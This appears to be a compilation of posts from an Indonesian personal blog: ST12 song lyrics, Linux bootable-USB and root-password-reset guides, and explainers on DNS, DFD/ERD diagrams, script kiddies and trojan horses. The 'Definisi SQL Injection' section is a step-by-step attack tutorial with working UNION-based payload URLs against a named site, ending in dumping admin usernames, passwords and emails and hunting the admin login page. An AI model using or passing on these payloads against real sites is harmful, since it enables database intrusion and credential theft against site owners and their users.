Ruang Hidup

Ruang Hidup adalah salah satu lagu dari Band ST12, Lirik lagunya sangat dalam dan bermotivasi, dalam lirik lagu ini mengisahkan perjalanan hidup tak selalu indah dan bahagia, kadang juga ada yang pahit. Tapi walaupun begitu kita harus tetap bisa tersenyum..

Ok langsung saja, Lirinya adalah :

Masihkah ku bisa tertawa terbahak
Dari sempitnya waktu yang begitu kelam
Perjuangan hidup memang sangatlah berat
Tuk melepas beban yang begitu memikat
Haruskah kuhentikan waktu yang sedang berputar
Namun kutak mungkin bisa tuk merubah segalanya

Reff
Aku masih bisa terus berjalan menikmati hidup
Meskipun sulit menjadi mudah
Jadikan cobaan itu anugerah
Yang bisa merubah ruang yang gelap menjadi indah
Dan terus langkahkan di garda depan
Berikan warna hidup kita menjadi indah

Back to reff


Gimana kawan??
Bagus kan Lirik lagunya, bisa dijadikan sebagai motivasi diri..

Rasa Yang Tertinggal

Hai kawan, Kali ini saya akan mengupdate sebuah lirik lagu dari band kesukaan saya yaitu ST12. Pada postingan kali ini, saya akan memosting lagu yang berjudul "RASA YANG TERTINGGAL". Lagu ini menurut saya enak untuk didengarkan, liriknya juga sangat bagus. OK langsung saya kawan, liriknya adalah :

Bila asmaraku tlah tiba
Merenggut nafas di jiwa
Itu dia,,
Yang datang hadirkan cinta
Menyebar ke dalam rasa

Dapatkah ku mengatakannya
Perasaan yang ku punya
Untuk dia
Mestinya ku ungkapkan saja
Tuk dapat jawaban darinya

REFF :
Dapatkah aku memeluknya
Menjadikan bintang di surga
Memberikan warna yang bisa menjadikan indah
Aku tak mampu mengatakan, Aku tak mampu tuk mengungkapkan
Hingga sampai saat ini, prasaan tlah tertinggal

Dapatkah dia merasakan
Satu Nafas yang tersimpan
Itu bukan cinta sekedar cinta biasa
Yang sesaat dan trus Hilang

Back to REFF


 Ok, salam ST Setia... 

Membuat Bootable Linux di Flashdisk

Ingin dual boot dengan linux?? tapi bingung karena tidak punya CD Linuxnya?? tapi hanya punya file .iso nya saja?? Gak usah khawatir, dalam postingan kali ini saya akan mencoba share tentang membuat bootable linux di flashdisk, dalam postingan ini kita akan menggunakan software yang bernama UNetbootin {google banyak :D}. ok caranya mudah kok, seperti ini :

  1. Download dulu software UNetbootin tersebut, lalu install seperti biasa
  2. Lalu tancapkan flashdisk anda ke PC/Laptop anda
  3. Buka software tersebut
  4. Klik pada bagian Disk Image lalu cari dimana file iso anda, kemudian masukkan file iso tersebut

  5. Biasanya Flasdisk akan otomatis terdeteksi oleh software tersebut, jika belum terdeteksi maka terlebih dahululah search dimana letak flashdisk anda
  6. Dan terakhir klik OK
  7. Dan Tunggu prosesnya hingga selesai
  8. Jika sudah restart dan silahkan booting dengan flashdisk anda

 Ok cukup sekian share dari saya, semoga postingan kali ini bermanfaat dan dapat membantu anda
Salam jumpa di postingan berikutnya..

Membuat Bootable WIndows di Ubuntu 12.04

Halo kawan, gimana kabar kalian semua?? baik semua kan??
Hehe dah lama nih gak posting soal Ubuntu, ada mungkin kira-kira 4 bulanan :D
Ok langsung saja ke pokok pembahasan, teman-teman yang pake ubuntu tetntunya bingung jika ingin membuat bootable windows, apa kalian pinjem lepi tetanga dulu yang di dalamnya terinstall OS Windows baru membuat bootable windows tersebut?? :D
Ok, Untuk postingan kali ini, saya akan membahas cara membuat bootable windows dengan flashdisk di ubuntu saya, yaitu ubuntu 12.04.. Disini kita menggunakan sotware yang bernama "WinUSB".  Pemakain software ini sangatlah mudah seperti halnya memakai di windows, unutk instalasinya adalah sepperti ini kawan :

  1. Buka Terminal
  2. Ketikkan sudo add-apt-repository ppa:colingille/freshlight
  3. Setelah itu tekan Enter untuk melanjutkan
  4. Setelah menambahkan repo tersebut, ketikkan sudo apt-get update && sudo apt-get install winusb
  5. Tunggu Proses instalasi sampai selesai
  6. Cara menggunakannya adalah pertama tancapkan flasdisk ke PC/Laptop agan semua
  7. Lalu buka winusb, klik from a disk image {jika menggunakan file iso}
  8. Lalu pilih drive/flasdisk anda yang ada di bawah, jika belum ada klik refresh
  9. Jika sudah ada pilih flashdisk anda dan klik next
  10. Kemudian tunggu sampai prosesnya selesai



 Mudah bukan kawan??
Yah mungkin hanya itu yang dapat saya share dalam postingan kali ini, semoga membantu kalian semua.

Aku Masih Sayang

Bagi Penggemar ST12 tentunya sudah pada tahu lagunya yang berjudul "AKU MASIH SAYANG", kawan-kawan semua yang ingin tau lirik lagunya, ini dia liriknya :

Kau rinduku, jiwaku indah memanggil nama mu
Mataku terbangun untuk menanti, menanti mu
Jangan pernah, kau ragukan cinta yang sesungguhnya
Itu bisa menghancurkan semua, bukan begitu,,

REFF :

Aku sungguh masih sayang padamu
Jangan sampai kau meninggalkan aku
Begitu sangat berharga Dirimu,
Bagiku

Dan ku pastikan setia di hatimu
Kanku korbankan semua untukmu
Sungguh ku berharap kaupun begitu
Padaku


Coba engkau rasakan cinta yang begitukah, mengesankan
Dan ku pasti dapatkan kemesraan yang penuh bintang


Back to REFF



Begitulah lirik lagu dari band ST12 yang bertajub "AKU MASIH SAYANG"

Reset password root Debian

Ketika akan menyalakan PC dan akan Mulai masuk pada root debian saya, saya menjumpai tidak dapat masuk ke dalam root saya, padahal password yang saya masukkan adalah benar. seketika itu saya searching dan menemukan caranya. reset password debian mungkin hampir sama kasusnya dengan reset password ubuntu 8.10  ,  dalam kasus kali ini saya menggunakan debian 6, mari kita mulai.

  • Hidupkan CPU, atau restart PC anda
  • Kemudian muncul GRUB, tekan tombol "e" untuk melakukan pengeditan pada GRUB tersebut

  • Cari kata / text "linux /boot/vmlinuz-2.6.32-5-686 root=UUID=c3ae9015-1ef0-4e9f-bb73-dbf89dbc0ec3 ro quiet"

  • Tambahkan script "init=/bin/bash" (tanpa tanda kutip) di akhir baris tersebut
  • Lalu tekan ctrl + x, kemudian anda akan masuk otomatis sebagai root

  • Mount root sebagai rw, fungsinya agar dapat mengedit password, dengan ketik"mount -o remount rw /"
  • Setelah itu rubah password dengan perintah "passwd"
  • Masukkan password baru, kemudian ulangi password baru tersebut, dan berhasil

  • Reboot pc anda dan masuk sebagai root
  • Selamat, Debian anda sudah normal seperti biasanya

Tentang DNS


Domain Name System (DNS) adalah distribute database system yang digunakan untuk pencarian nama komputer (name resolution) di jaringan yang mengunakan TCP/IP (Transmission Control Protocol/Internet Protocol). DNS biasa digunakan pada aplikasi yang terhubung ke Internet seperti web browser atau e-mail, dimana DNS membantu memetakan host name sebuah komputer ke IP address. Selain digunakan di Internet, DNS juga dapat di implementasikan ke private network atau intranet dimana DNS memiliki keunggulan seperti:
  • Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address sebuah komputer cukup host name (nama Komputer).
  • Konsisten, IP address sebuah komputer bisa berubah tapi host name tidak berubah.
  • Simple, user hanya menggunakan satu nama domain untuk mencari baik di Internet maupun di Intranet.

DNS dapat disamakan fungsinya dengan buku telepon. Dimana setiap komputer di jaringan Internet memiliki host name (nama komputer) dan Internet Protocol (IP) address. Secara umum, setiap client yang akan mengkoneksikan komputer yang satu ke komputer yang lain, akan menggunakan host name. Lalu komputer anda akan menghubungi DNS server untuk mencek host name yang anda minta tersebut berapa IP address-nya. IP address ini yang digunakan untuk mengkoneksikan komputer anda dengan komputer lainnya.

Sejarah DNS
Sebelum dipergunakannya DNS, jaringan komputer menggunakan HOSTS files yang berisi informasi dari nama komputer dan IP address-nya. Di Internet, file ini dikelola secara terpusat dan di setiap loaksi harus di copy versi terbaru dari HOSTS files, dari sini bisa dibayangkan betapa repotnya jika ada penambahan 1 komputer di jaringan, maka kita harus copy versi terbaru file ini ke setiap lokasi. Dengan makin meluasnya jaringan internet, hal ini makin merepotkan, akhirnya dibuatkan sebuah solusi dimana DNS di desain menggantikan fungsi HOSTS files, dengan kelebihan unlimited database size, dan performace yang baik. DNS adalah sebuah aplikasi services di Internet yang menerjemahkan sebuah domain name ke IP address. Sebagai contoh, www untuk penggunaan di Internet, lalu diketikan nama domain, misalnya: yahoo.com maka akan di petakan ke sebuah IP mis 202.68.0.134. Jadi DNS dapat di analogikan pada pemakaian buku telepon, dimana orang yang kita kenal berdasarkan nama untuk menghubunginya kita harus memutar nomor telepon di pesawat telepon. Sama persis, host komputer mengirimkan queries berupa nama komputer dan domain name server ke DNS, lalu oleh DNS dipetakan ke IP address.
Struktur DNS
Root-Level Domains
Domain ditentukan berdasarkan tingkatan kemampuan yang ada di struktur hirarki yang disebut dengan level. Level paling atas di hirarki disebut dengan root domain. Root domain di ekspresikan berdasarkan periode dimana lambang untuk root domain adalah (â€Å“.”).

Top-Level Domains
Pada bagian dibawah ini adalah contoh dari top-level domains:
  • com : Organisasi Komersial
  • edu : Institusi pendidikan atau universitas
  • org : Organisasi non-profit
  • net : Networks (backbone Internet)
  • gov : Organisasi pemerintah non militer
  • mil  : Organisasi pemerintah militer
  • num : No telpon
  • arpa : Reverse DNS
  • xx : dua-huruf untuk kode negara (id:Indonesia,sg:singapura,au:australia,dll)
Host Names
Domain name yang digunakan dengan host name akan menciptakan fully qualified domain name
(FQDN) untuk setiap komputer. Sebagai contoh, jika terdapat fileserver1.detik.com, dimana fileserver1 adalah host name dan detik.com adalah domain name.
Bagaimana DNS Bekerja?
Fungsi dari DNS adalah menerjemahkan nama komputer ke IP address (memetakan). Client DNS disebut dengan resolvers dan DNS server disebut dengan name servers. Resolvers atau client mengirimkan permintaan ke name server berupa queries. Name server akan memproses dengan cara mencek ke local database DNS, menghubungi name server lainnya atau akan mengirimkan message failure jika ternyata permintaan dari client tidak ditemukan. Proses tersebut disebut dengan Forward Lookup Query, yaitu permintaan dari client dengan cara memetakan nama komputer (host) ke IP address.
  • Resolvers mengirimkan queries ke name server
  • Name server mencek ke local database, atau menghubungi name server lainnya, jika ditemukan akan diberitahukan ke resolvers jika tidak akan mengirimkan failure message
  • Resolvers menghubungi host yang dituju dengan menggunakan IP address yang diberikan name server
Kesimpulan
DNS adalah hasil pengembangan dari metode pencarian host name terhadap IP address di Internet. Pada DNS client (resolver) mengirimkan queries ke Name Server (DNS). Name Server akan menerima permintaan dan memetakan nama komputer ke IP address Domain Name Space adalah pengelompokan secara hirarki yang terbagi atas root-level domains, top-level domains, second-level domains, dan host names.

DFD dan ERD

Pengertian dan Contoh dari DFD dan ERD



DFD ( Data Flow Diagram )
Data Flow Diagram (DFD) adalah alat pembuatan model yang memungkinkan profesional sistem untuk menggambarkan sistem sebagai suatu jaringan proses fungsional yang dihubungkan satu sama lain dengan alur data, baik secara manual maupun komputerisasi. DFD ini sering disebut  juga dengan nama Bubble chart, Bubble diagram, model proses, diagram alur kerja, atau model fungsi.

DFD ini adalah salah satu alat pembuatan model yang sering digunakan, khususnya bila fungsi-fungsi sistem merupakan bagian yang lebih penting dan kompleks  dari pada data yang dimanipulasi oleh sistem. Dengan kata lain, DFD adalah alat pembuatan model yang memberikan penekanan hanya pada fungsi sistem.
DFD ini merupakan alat perancangan sistem  yang berorientasi pada  alur data dengan konsep dekomposisi dapat digunakan untuk penggambaran analisa maupun rancangan sistem yang mudah dikomunikasikan oleh profesional sistem kepada pemakai maupun pembuat program.
KOMPONEN DATA FLOW DIAGRAM




Menurut Gene dan Serson





Komponen Terminator / Entitas Luar
Terminator mewakili entitas eksternal yang berkomunikasi dengan sistem yang sedang dikembangkan.Biasanya terminator dikenal dengan nama entitas luar (external entity).  
 
Terdapat dua jenis terminator :
  1. Terminator Sumber ( source) : merupakan terminator yang menjadi sumber. 
  2. Terminator Tujuan (sink) : merupakan terminator yang menjadi tujuan  data / informasi sistem.
Komponen Proses 
Komponen proses menggambarkan bagian dari sistem yang mentransformasikan input menjadi output. 
Ada empat kemungkinan yang dapat terjadi dalam proses sehubungan dengan input dan output :  








Ada beberapa hal yang perlu diperhatikan tentang proses : 
  • Proses harus memiliki input dan output.
  • Proses dapat dihubungkan dengan komponen terminator, data store atau proses melalui alur data.
  • Sistem/bagian/divisi/departemen yang sedang dianalisis oleh profesional sistem digambarkan dengan komponen proses.
Komponen Data Store
Komponen ini digunakan untuk membuat model sekumpulan paket data dan  diberi nama dengan  kata benda jamak, misalnya Mahasiswa.

Data store ini biasanya berkaitan dengan penyimpanan-penyimpanan, seperti file atau database yang  berkaitan dengan penyimpanan secara komputerisasi, misalnya file disket, file harddisk, file pita magnetik. Data store juga berkaitan dengan penyimpanan secara manual seperti buku alamat, file folder, dan agenda.

Komponen Data Flow / Alur Data
Suatu data flow / alur data digambarkan dengan anak panah, yang menunjukkan arah menuju ke dan keluar dari suatu proses. Alur data ini digunakan untuk menerangkan perpindahan data atau paket data/informasi dari satu bagian sistem ke bagian lainnya.

Contoh Data Flow Diagram


ERD ( Entity Relationship Diagram )
Entity Relationship Diagram (ERD) adalah menyediakan cara untuk mendeskripsikan perancangan basis data pada peringkat logika.

Entity Relationship Diagram (ERD) adalah gambaran mengenai berelasinya antarentitas.
- Sistem adalah kumpulan elemen yang setiap elemen memiliki fungsi masing-masing dan secara bersama-sama mencapai tujuan dari sistem tersebut.
- ‘Kebersama-sama’-an dari sistem di atas dilambangkan dengan saling berelasinya antara satu entitas dengan entitas lainnya
- Entitas (entity/ entity set), memiliki banyak istilah di dalam ilmu komputer, seperti tabel (table), berkas (data file), penyimpan data (data store), dan sebagainya

ERD merupakan suatu model untuk menjelaskan hubungan antar data dalam basis data berdasarkan objek-objek dasar data yang mempunyai hubungan antar relasi.ERD untuk memodelkan struktur data dan hubungan antar data, untuk menggambarkannya digunakan beberapa notasi dan simbol. Pada dasarnya ada tiga simbol yang digunakan, yaitu :
  1. Entiti
Entiti merupakan objek yang mewakili sesuatu yang nyata dan dapat dibedakan dari sesuatu yang lain. Simbol dari entiti ini biasanya digambarkan dengan persegi panjang.
  1. Atribut
Setiap entitas pasti mempunyai elemen yang disebut atribut yang berfungsi untuk mendeskripsikan karakteristik dari entitas tersebut. Isi dari atribut mempunyai sesuatu yang dapat mengidentifikasikan isi elemen satu dengan yang lain. Gambar atribut diwakili oleh simbol elips.
  1. Hubungan / Relasi
Hubungan antara sejumlah entitas yang berasal dari himpunan entitas yang berbeda. Relasi dapat digambarkan sebagai berikut : Relasi yang terjadi diantara dua himpunan entitas (misalnya A dan B) dalam satu basis data yaitu: 1). Satu ke satu (One to one) Hubungan relasi satu ke satu yaitu setiap entitas pada himpunan entitas A berhubungan paling banyak dengan satu entitas pada himpunan entitas B. 2). Satu ke banyak (One to many) Setiap entitas pada himpunan entitas A dapat berhubungan dengan banyak entitas pada himpunan entitas B, tetapi setiap entitas pada entitas B dapat berhubungan dengan satu entitas pada himpunan entitas A. 3). Banyak ke banyak (Many to many) Setiap entitas pada himpunan entitas A dapat berhubungan dengan banyak entitas pada himpunan entitas B. contoh ERD
[database2.GIF]

Derajat Relationship

Terdapat 3 macam derajat dari relationship, yaitu :
  • Unary Degree (derajat satu), 
Bila satu entity mempunyai relasi terhadap dirinya sendiri.  Digambarkan sebagai berikut :



  • Binary degree (derajat dua) dan 
Bila satu relasi menghubugkan dua entity, digambarkan sebagai berikut :



  • Ternary degree (derajat tiga)
Bila satu entity menghubungkan lebih dari dua entity. Digambarkan sebagai berikut :


Simbol-simbol  ER-Diagram



Contoh Penggambaran Diagram ERD

Definisi Script Kiddie

Script Kiddie adalah seseorang yang memiliki kemampuan kurang dalam dunia internet yang hanya bisa menggunkan tools orang lain untuk melakukan serangan terhadap jaringan internet, biasanya hanya untuk sensasi. Pada zaman sekarang ini menjadi seorang Script Kiddie tidak lah susah karena hanya dengan bermodal koneksi internet dan mengerti sedikit tentang komputer,

Def inisi Script Kiddie
Di dunia hacker sendiri, Seorang Script Kiddie diartikan sebagai seseorang dengan niat buruk yang menggunakan program  lain untuk menyerang sistem komputer atau pun melakukan deface pada website. Di sebut seorang script kiddie bukan lah sebuah kebanggaan, biasanya diasumsikan sebagasi seorang anak (kid) yang kurang memiliki kemampuan untuk membuat tools sendiri dan biasanya hanya bertujuan untuk membuat sensasi. Bagaimana pun hal ini dapat menimbulkan banyak masalah bagi para pengguna komputer dan kita yang sering menggunakan internet, biasanya seorang script kiddie mencari target buka dengan memilih target tetapi lebih mengandalkan hasil scan dari tools yang mendeteksi kelemahan sebuah sistem pada umumnya. Cepat atau lambat tools yang digunakan Seorang script kiddie akan memberikan hasil scan dari sebuah sistem yang lemah yang nantinya dapat diserang dengan mudah, nah dari dasar itu lah Seorang Script Kiddie menjadi ancaman, siapapun dapat menjadi target selanjutnya karena Script Kiddie tidak menentukan korban tetapi menggunakan hasil scan dari sebuah tools yang mendeteksi kelemahan sebuah sistem.

Senjata Yang Di Gunakan Script Kiddie Di Zaman ini apa pun sangat mudah di temukan di internet, sama juga dengan senjata andalan Script Kiddie. Banyak sekali tools yang bisa di download di internet dan dapat di gunakan dengan mudah walau pun digunakan orang awam sekali pun seperti saya ini. Satu yang sangat sederhana yaitu dengan cara menscan IP/web untuk mencari kelemahan sistem yang dapat di serang dengan mudah, untuk menjadi Seorang script kiddie. Seseorang tidak usah kerja hingga larut malam karena banyak tools yang bekerja secara otomatis jadi bisa kita tinggal beraktivitas dan kita tinggal menunggu hasil scan dari sebuah tool.

Hal buruk yang dapat terjadi Sekali sistem anda lemah maka penyusup akan langsung masuk dan menyerang sistem anda dengan tanpa ada rasa kasih sedikit pun. Dibawah ini adalah sedikit hal buruk yang dapat terjadi jika sebuah sistem telah di serang:
1. Deface Web
Setelah penyusup lalu berhasil masuk ke web serve dan
mempunyai akses penuh di sebuah webs, biasanya yang di lakukan
seorang script kiddie adalah mengganti halaman utama sebuah web
dengan id nick name beserta pesan yang ditujukan buat admin web
tersebut.
Tidak hanya itu banyak para penyusup mengobrak-ngabrik isi
web sehingga web tidak lagi bisa di akses oleh pengunjung atau
tidak berjalan dengan baik lagi. hal tersebut merupakan sebuah
prestasi bagi seorang script kiddie.
2. Menginfeksi sistem
Salah satu contohnya melalui virus atau pun worm yang di
sebar melalui internet yang nantinya virus atau worm yang
menginfeksi sebuah komputer akan menggubah sisitem, menggambil
file-file penting yang ada pada komputer atau merusak total
sebuah computer hingga tidak bisa digunakan kembali.
3. Mengambil password
Password dengan strong type ( mempunyai password yang sulit di
tebak ) kadang tidak berdaya jika script kiddie telah
menjalankan program keylogger atau sebuah program yang dapat
meng-enskrip sebuah password

Jika seorang script kiddie telah mendapatkan akses penuh,
maka mereka dapat sesuka hati melakukan hal apa saja, contohnya
seperti menghaspus atau mencuri file-file sangat penting.
Bayangkan jika file-file penting anda atau file-file
sensitif lainnya dicuri oleh orang lain jika computer anda
diserang oleh penyusup.
Proteksi-proteksi
Sebuah serangan terjadi karena adanya sebuah kelemahan
maka dari itu kita harus melakukan proteksi-proteksi berdasarkan
metode serangan.
1. Minimalisasi sistem
Salah satu celah keamanan yang dapat di susup oleh
penyerang adalah melalui service atau program yang sedang
berjalan pada sistem di computer anda. Karena itu pastikan kita
meminimalis service atau program yang berjalan di komputer anda.
Dan anda dapat menonaktifkan service atau program yang tidak di
digunakan atau diperlukan.
2. Manajemen password
Hal yang harus anda lakukan hanyalah berhati-hati jika
anda ingin membuat sebuah password yang umum seperti : “admin”,
“1234”, “qwerty”, bahkan ‘p@$$w0rd” dan masih banyak password
yang mempunyai tingkat kesulitan yang sangat mudah di tebak.
Sepertinya kebobolan hanya tinggal menunggu
Kini dengan hanya menggunakan search eingine seorang
script kiddie dapat menemukan sebuah database yang berisi
kumpulan-kumpulan password dan hal-hal lain yang bersifat
sensitif
3. Gunakan firewall
Setidaknya dengan kita menggunakan firewall dapat
melindungi serangan yang datang dari port yang di ijinkan oleh
firewall biasanya port 80 yang pada umumnya digunakan sebagai
web serve. Firewall juga dapat menutupi kelemahan-kelemahan
sebuah sistem.
4. Gunakan tools
Jika seorang script kiddie menggunakan tools untuk
menyerang maka gunakan hal yang sama untuk mengetahui sistem
anda sendiri.3T ools yang didesain untuk mencari kelemahan sistem di
sebut vulnerability scanner. Biasanya software ini akan
melakukan scan IP address, sistem operasi, dan aplikasi yang
berjalan lalu akhirnya menentukan update pada operasi sistem dan
aplikasi yang memiliki kelemahan.

5. Selalu update
Update selalu program-program yang anda bisa gunakan,
karena biasanya banyak sekali program yang masih banyak memiliki
masalah karena hal ini dapat menjadi boomerang bagi sistem jika
ditemukan crash pada program.

Sumber : http://tkjsmkn1slawi.forumotion.com/t77-mengenal-script-kiddie

Definisi SQL Injection

SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

===========
= Step Satu:  =
===========
carilah target
misalkan: http//www.snipp55.com/berita.php?id=100
Tambahkan karakter ( ‘ ) pada akhir url atau menambahkan karakter ( – ) untuk melihat apakah ada pesan error.
contoh:
http//www.snipp55.com/berita.php?id=100′ atau
http//www.snipp55.com/berita.php?id=-100
sehingga muncul pesan error seperti berikut :
” Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/html/classes/storedProcedures/GetArticleData.class.php on line 92 “
(dan masih banyak lagi pesan error yg lainnya)

==========
= Step Dua: =
==========
mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by
contoh:
http//www.snipp55.com/berita.php?id=-100+order+by+1–  atau
http//www.snipp55.com/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…
misal:
http//www.snipp55.com/berita.php?id=-100+order+by+1–
http//www.snipp55.com/berita.php?id=-100+order+by+2–
http//www.snipp55.com/berita.php?id=-100+order+by+3–
http//www.snipp55.com/berita.php?id=-100+order+by+4– dst
sehingga muncul pesan error…
misal pesan errornya muncul di table 9 :
http//www.snipp55.com/berita.php?id=-100+order+by+9–
berarti table yang terdapat dalam database adalah 8
menjadi http//www.snipp55.com/berita.php?id=-100+order+by+8–

===========
= Step Tiga:   =
===========
mencari nomor keberuntungan dengan menggunakan perintah union select
karena tadi tablenya hanya ada 8
maka: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–
ok seumpama yg keluar adalah angka 5
maka gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai, masukan perintah tsb pada angka yg keluar tadi
misal: http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–
lalu lihat versi database yg digunakan seumpama versi 4 maka tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema
jika versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema

============
= Step Empat:=
============
menampilkan table yg ada pada web tsb dengan
perintah group_concat(table_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()–        >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()–
ibaratkan yang muncul adalah table  “admin”

===========
= Step Lima:=
===========
menampilkan kolom yang terdapat di table “admin”
perintah group_concat(column_name)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+information_schema.columns+where+table_name=Oxhexa–       >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Oxhexa–
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://home2.paulschou.net/tools/xlate/
contoh kata yg ingin di konversi yaitu “admin” (tanpa tanda kutip) maka akan menjadi 61646d696e
maka : http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=Ox61646D696E–
ibaratkan yang muncul adalah column username,password,email

============
= Step Enam : =
============
memunculkan apa yg tadi telah dikeluarkan dari column yaitu dengan cara
perintah concat_ws(Ox3a,hasil isi column yg akan dikeluarkan)         >>> dimasukan pada angka keberuntungan yg keluar tadi
perintah +from+(nama table berasal)          >>> dimasukan setelah angka terakhir
Contoh :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,column yang akan dilihat isinya),6,7,8+from+(nama table)–
contoh column yang keluar td adalah column username,password,email
Maka :
http//www.snipp55.com/berita.php?id=-100+union+select+1,2,3,4,concat_ws(Ox3a,username,Ox3a,password,Ox3a,email),6,7,8+from+admin–
contoh yang keluar :
admin:an4kal4y:alay_alay@alay.com
cara membaca nya seperti berikut :
username : admin
password : an4kal4y
email : alay_alay@alay.com

==============
= Step Tujuh    :   =
==============
tahap terakhir yang harus dilakukan adalah mencari halaman admin atau login (adminlogin).
website yang menyediakan program pencarian login admin :
http://revtan.site40.net/admin/?
Selamat Mencoba

Sumber : http://snipp55.wordpress.com/2010/12/01/pengertian-sql-injection-dan-langkah2nya/

Pengertian Trojan Horse

Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan yang dapat merusak sebuah sistem atau jaringan.Tujuan dari Trojan adalah memperoleh informasi dari target dan mengendalikan target untuk memperoleh hak akses pada target. Trojan bersifat "stealth" atau siluman dan tidak terlihat dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik. Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna. Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM) dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna misalnya: password , data kartu kredit , dan lain- lain.
Trojan juga dapat menginfeksi sistem ketika pengguna mengunduh aplikasi dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi tersebut dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan. Ada lagi sebuah jenis Trojan yang dapat mengimbuhkan dirinya sendiri ke sebuah program untuk memodifikasi cara kerja program yang diimbuhinya. Jenis Trojan ini disebut sebagai Trojan virus . Software jahat dan anti software jahat terus berkembang saling adu kuat. Ketika serangan virus, trojan horse dan malware lain dapat diatasi oleh sebuah sistem pengamanan, serangan berikutnya sebagai respon terhadap sistem pengamanan tersebut datang lagi dengan kemampuan yang lebih tinggi.

Berikut 5 jenis trojan horse yang tehnik serangannya dengan cara mengelabui sistem pengamanan :

 1. GLIEDER TROJAN=> Glieder trojan menggunakan proses penularan bertingkat, dimana tahap pertamanya adalah sebuah program malware kecil akan berubah secara terus menerus, sehingga program anti-virus yang terpasang dalam PC tidak akan mengenalinya sebagai malware. Begitu glieder trojan terinstal dalam PC, program ini akan berusaha menghilangkan kemampuan sistem pengamanan yang terpasang, baru setelah itu melakukan aktifitas jahatnya seperti memindahkan atau mencuri data penting, atau aktifitas lainnya sesuai keinginan penyerang.

 2. GOZI TROJAN WEBSITES=> Trojan jenis ini dapat menggunakan secure cocket layer (SSL) untuk menyandi dan mengamanankan data penting dan sensitif seperti on-line banking atau transaksi on-line. Ciri-ciri website yang menggunakan SSL adalah adanya gambar gembok di address bar. Gozi trojan akan menghindari pengamanan ini (SSL) dengan cara mengelabui OS Windows, sehingga seakan- akan dia adalah bagian dari proses SSL. Yang terjadi adalah data meninggalkan browser melalui gozi trojan sebelum data tersebut disandikan dan dikirimkan keluar PC menuju network. Program jahat ini memang tidak seperti trojan pada umumnya, dia masuk sampai ke operating system dengan mengelabui layered service providers (LSPs).

3. SPAMTHRU TROJAN=> Program jahat ini berlaku seolah-oleh sebuah program anti-virus tambahan, sehingga dapat dikatakan ?malware" yang melakukan scanning malware dalam PC?. Bila PC memasang anti-virus baru yang lebih baik, dia akan memblok malware ini agar tidak bisa melakukan up-date yang dapat mengubah dirinya menjadi malware lain.

4. SPYAGNT TROJAN=> Program ini bermain di area penyandian file dalam windows , yaitu ketika kita melakukan penyandian dengan fasilitas yang disediakan oleh windows. SpyAgent ini memposisikan dirinya sebagai user account tingkat administrator, dan menggunakan account tersebut untuk menyandi file-file. Program anti-virus yang terpasang tidak akan mendeteksi adanya file yang sudah disusupi program jahat.

5. JOWSPRY TROJAN=> Jowspry trojan mengelabui PC dengan dengan, seolah-olah sebai sebuah program yang memang sudah dikenal dan diakui oleh PC, yaitu windows up-date. Program ini akan melakukan koneksi seperti background intelligent transfer service yang digunakan oleh program windows up-date, sehingga tidak ditangkal oleh program firewall yang terpasang dalam PC. Seolah mengatakan ?hai firewall, saya windows up- date. Untuk mengantisipasi kehadiran trojan-trojan tersebut agar tidak bersarang dalam PC atau tidak memberi kesempatan pada trojan untuk beraksi, perlu melakukan pengantisipasian : selalu up-date windows dan program aplikasinya. usahakan tidak membuka attachement atau mengklik link dalam e-mail yang tidak jelas. dan gunakan selalu program anti- virus yang baik. Selain Trojan yang menyerang PC, sebenarnya ada Trojan yang menyerang perangkat seluler. Dalam hal ini yang menggunakan operating system (OS). Dan yang perlu di ketahui, perangkat seluler yang sering dan bahkan menjadi sasaran empuk Trojan adalah jenis Symbian. Dan terutama adalah jenis Symbian s60v2. Jika anda pengguna Symbian jenis tersebut, maka selalu pasang anti-virus pada perangkat seluler anda. Maka tak heran jika ada yang menyebutkan s60v2 adalah Hp virus. Selain Trojan, masih banyak varian virus yg dapat menginfeksi perangkat seluler, seperti halnya pada PC.

Cara kerja Trojan Horse
